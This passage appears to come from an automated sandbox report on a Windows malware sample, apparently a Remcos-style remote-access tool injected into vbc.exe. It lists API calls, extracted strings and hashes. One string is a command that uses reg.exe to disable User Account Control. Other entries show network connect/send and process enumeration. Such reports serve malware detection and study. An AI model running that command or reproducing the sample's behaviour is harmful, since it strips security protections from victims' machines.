                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                    • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID: XQG
                    • API String ID: 1958988193-3606453820
                    • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                    • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                    • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                    • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                    APIs
                    • RegisterClassExA.USER32(00000030), ref: 0041D55B
                    • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                    • GetLastError.KERNEL32 ref: 0041D580
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613
                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                    • CloseHandle.KERNEL32(?), ref: 004077AA
                    • CloseHandle.KERNEL32(?), ref: 004077AF
                    Strings
                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282
                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                    Strings
                    • SG, xrefs: 004076DA
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 004076C4
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    • API String ID: 0-2032564418
                    • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                    • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                    • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                    • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                    • SetEvent.KERNEL32(?), ref: 0040512C
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                    • CloseHandle.KERNEL32(?), ref: 00405140
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    • API String ID: 2993684571-305739064
                    • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                    • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                    APIs
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                    • Sleep.KERNEL32(00002710), ref: 0041AE07
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    • API String ID: 614609389-2816303416
                    • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                    • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                    • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                    • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853
                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                    • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                    APIs
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    • _free.LIBCMT ref: 00444E06
                    • _free.LIBCMT ref: 00444E1D
                    • _free.LIBCMT ref: 00444E3C
                    • _free.LIBCMT ref: 00444E57
                    • _free.LIBCMT ref: 00444E6E
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                    • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                    • _free.LIBCMT ref: 004493BD
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00449589
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                    • String ID:
                    • API String ID: 1286116820-0
                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                    APIs
                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
                    • API String ID: 4269425633-0
                    • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                    • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                    APIs
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                    • _free.LIBCMT ref: 0044F3BF
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
                    • API String ID: 336800556-0
                    • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                    • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                    APIs
                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                    • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreatePointerWrite
                    • String ID:
                    • API String ID: 1852769593-0
                    • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                    • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                    • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                    • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                    APIs
                    • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                    • _free.LIBCMT ref: 004482D3
                    • _free.LIBCMT ref: 004482FA
                    • SetLastError.KERNEL32(00000000), ref: 00448307
                    • SetLastError.KERNEL32(00000000), ref: 00448310
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free
                    • String ID:
                    • API String ID: 3170660625-0
                    • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                    • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                    • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                    • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                    APIs
                    • _free.LIBCMT ref: 004509D4
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 004509E6
                    • _free.LIBCMT ref: 004509F8
                    • _free.LIBCMT ref: 00450A0A
                    • _free.LIBCMT ref: 00450A1C
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                    • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                    • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                    • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                    APIs
                    • _free.LIBCMT ref: 00444066
                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                    • _free.LIBCMT ref: 00444078
                    • _free.LIBCMT ref: 0044408B
                    • _free.LIBCMT ref: 0044409C
                    • _free.LIBCMT ref: 004440AD
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                    • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                    • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                    • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: PkGNG
                    • API String ID: 0-263838557
                    • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                    • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                    • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                    • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                    APIs
                    • _strpbrk.LIBCMT ref: 0044E738
                    • _free.LIBCMT ref: 0044E855
                      • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                      • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                      • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                    • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                    • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                    • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventTick
                    • String ID: !D@$NG
                    • API String ID: 180926312-2721294649
                    • Opcode ID: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                    • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                    • Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                    APIs
                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                      • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                    • String ID: XQG$NG$PG
                    • API String ID: 1634807452-3565412412
                    • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                    • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                    • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                    • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: `#D$`#D
                    • API String ID: 885266447-2450397995
                    • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                    • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                    • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                    • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 00443475
                    • _free.LIBCMT ref: 00443540
                    • _free.LIBCMT ref: 0044354A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    • API String ID: 2506810119-50795131
                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                    • GetLastError.KERNEL32 ref: 0044B931
                    Strings
                    Memory Dump Source
